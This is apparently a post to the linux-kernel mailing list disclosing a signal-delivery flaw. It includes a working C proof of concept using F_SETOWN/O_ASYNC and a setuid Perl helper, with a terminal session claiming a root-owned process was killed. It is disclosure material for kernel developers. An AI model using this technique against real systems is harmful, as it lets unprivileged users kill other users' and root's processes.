OK. Easy enough.
typhaon; cat sigio.c
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
int s, p;
if(argc != 3) {
fputs("Please specify a pid to send signal to and setuid program to run.\n",
stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Please do something in sub-program.\n");
system(argv[2]);
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}
typhaon; cat test.pl
#!/usr/bin/perl
$<=$>=0;
print "Please press enter.\n";
<>;
typhaon; ls -l
total 7
-rwxr-xr-x 1 luyer ucs 4830 Nov 25 14:54 sigio*
-rw-r--r-- 1 luyer ucs 540 Nov 25 14:54 sigio.c
-rwsr-xr-x 1 root ucs 60 Nov 25 14:55 test.pl*
typhaon; id
uid=200(luyer) gid=20010(ucs) groups=20010(ucs),0(root),8(mail),20(dialout),24(cdrom),25(floppy),29(audio),1000(wheel)
typhaon; ./sigio 10243 ./test.pl
Please do something in sub-program.
Please press enter.
SIGIO send attempted.
typhaon;
Guess what? Just killed root-owned process 10243. Finding a program which
does what test.pl does is not impossible.
What does this mean? Well, if you can find a program which sets its UID and
EUID, and you can find someone else running that program, you can probably
kill their copy. If you can find a program which sets EUID and UID to root,
you can use it to kill root-owned processes. etc...
There exist programs which set UID and EUID, for example SUID perl scripts
which want to exec SUID programs (such as ssh) as someone else; any SUID
perl script containing the line "$< = $>;".
David.
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/